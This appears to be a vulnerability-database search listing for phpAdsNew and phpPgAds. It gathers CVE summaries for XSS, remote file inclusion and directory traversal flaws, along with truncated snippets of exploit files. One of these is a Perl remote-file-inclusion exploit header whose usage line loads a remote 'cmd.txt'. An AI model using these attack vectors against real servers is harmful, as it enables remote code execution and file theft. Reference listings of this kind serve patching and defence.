108 matches found
CVE-2007-0363
CVE-2007-0363 is an XSS vulnerability described in the primary CVE entry. Affected products are Openads for PostgreSQL (aka phpPgAds) before 2.0.10 and Openads (aka phpAdsNew) before 2.0.10. The issue occurs in admin-search.php and allows remote attackers to inject arbitrary web script or HTML vi...
CVE-2006-6415
PHP remote file inclusion vulnerability in admin/lib-maintenance.inc.php in phpAdsNew 2.0.4-pr2 allows remote attackers to execute arbitrary PHP code via a URL in the phpAds_path parameter, a different component than CVE-2006-3984. NOTE: this issue is disputed by CVE, since phpAds_path is used as a...
CVE-2006-6415
CVE-2006-6415 describes a remote file inclusion risk in phpAdsNew 2.0.4-pr2, involving admin/lib-maintenance.inc.php and the phpAds_path parameter. Exploitation would allow remote PHP code execution via a URL. The issue is noted as disputed by CVE, since phpAds_path is used as a constant. Connect...
PT-2006-7024 · Phpadsnew · Phpadsnew
Name of the Vulnerable Software and Affected Versions: phpAdsNew version 2.0.4-pr2 Description: A remote file inclusion issue exists, allowing remote attackers to execute arbitrary PHP code via a URL in the phpAds_path parameter. This issue is disputed, as phpAds_path is used as a constant...
phpAdsNew-2.0.4-pr2 Remote File Inclusion Exploit
No description provided by source. !/usr/bin/perl phpAdsNew-2.0.4-pr2 Remote File Inclusion Exploit Download Script http://www.drunkenblog.com/drunkenblog-archives/i/phpAdsNew-2.0.4-pr2.zip Bug Found & coded By CrackersChild [email protected] Usage perl cra.pl target cmd shell...
phpadsnew-rfi.txt
!/usr/bin/perl phpAdsNew-2.0.4-pr2 Remote File Inclusion Exploit Download Script http://www.drunkenblog.com/drunkenblog-archives/i/phpAdsNew-2.0.4-pr2.zip Bug Found & coded By CrackersChild [email protected] Usage perl cra.pl perl cra http://site.com/ http://site.com/cmd.txt c...
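PHPAdsNew Remote Arbitrary Code Execution Vulnerability
phpAdsNew is a website banner management program written in PHP. phpAdsNew contains a security vulnerability that allows a remote attacker to execute arbitrary code on the system with the privileges of the web server process. The program uses a variable, $phpAds_path, whose value can be set by a remote user, but phpAdsNew does not properly check this user input. By sending a carefully constructed URL request, a remote attacker can cause the affected phpAdsNew to execute arbitrary PHP programs hosted on a third-party host. phpAdsNew phpAdsNew 2.0beta 6 Temporary workaround: Niels Leenheer ( [email protected] ) provided the following fix:...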
phpAdsNew-2.0.8-2.txt
====================================================================================== phpAdsNew = Remote File Include ====================================================================================== Scripts: phpAdsNew Download: http://sourceforge.net/projects/phpAdsNew Version : 2.0.8...
phpAdsNew-2.0.8 <= (adlayer.php) Remote File Include
====================================================================================== phpAdsNew = Remote File Include ====================================================================================== Scripts: phpAdsNew Download: http://sourceforge.net/projects/phpAdsNew Version : 2.0.8...
CVE-2006-5515
Cross-site scripting (XSS) vulnerability in lib-history.inc.php in phpAdsNew and phpPgAds before 2.0.8-pr1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, related to injected data that is stored by a delivery script and displayed by the admin interface...
CVE-2006-5515
CVE-2006-5515 is a stored XSS vulnerability in the lib-history.inc.php component of phpAdsNew and phpPgAds up to version 2.0.8-pr1. The issue allows remote attackers to inject arbitrary web script via vectors related to data stored by a delivery script and displayed in the admin interface. Affec...
CVE-2006-5437
Directory traversal vulnerability in upgrade.php in phpAdsNew 2.0.8 allows remote attackers to read arbitrary files via a .. (dot dot) in the phpAds_config[language] parameter. NOTE: this issue could not be reproduced by a third party...
CVE-2006-5437
Affected software: phpAdsNew 2.0.8. Issue: directory traversal in upgrade.php due to unsanitized input in phpAds_config[language] parameter, enabling remote attackers to read arbitrary files by supplying a .. payload. Root cause: insufficient input validation in upgrade.php. Impact: potential exp...
PT-2006-6156 · Phpadsnew · Phpadsnew
Name of the Vulnerable Software and Affected Versions: phpAdsNew version 2.0.8 Description: A directory traversal issue exists, allowing remote attackers to read arbitrary files. This is achieved by using a .. (dot dot) in the phpAds_config[language] parameter in the "upgrade.php" file...
phpAdsNew-2.0.8.txt
Authors: - Michał wacky Błaszczak - Nobody http://iHACK.pl File: modules/phpads/admin/upgrade.php Code: // Load language strings if (file_exists("../language/".$phpAds_config['language']."/default.lang.php")) include("../language/".$phpAds_config['language']."/default.lang.php"); else $phpAds_config['language'] =...
phpAdsNew include bug!
Authors: - Michał wacky Błaszczak - Nobody http://iHACK.pl File: modules/phpads/admin/upgrade.php Code: // Load language strings if (file_exists("../language/".$phpAds_config['language']."/default.lang.php")) include("../language/".$phpAds_config['language']."/default.lang.php"); else $phpAds_config['language'] =...
phpauction21.txt
+-------------------------------------------------------------------- + + PHPAuction 2.1 with phpAdsNew 2.0.5 Remote File Inclusion + +-------------------------------------------------------------------- + + Affected Software .: PHPAuction 2.1 maybe higher with phpAdsNew, + phpAdsNew 2.0.5 maybe...
CVE-2006-3984
PHP remote file inclusion vulnerability in phpAdsNew/view.inc.php in Albasoftware Phpauction 2.1 and possibly later versions, with phpAdsNew 2.0.5, allows remote attackers to execute arbitrary PHP code via a URL in the phpAds_path parameter...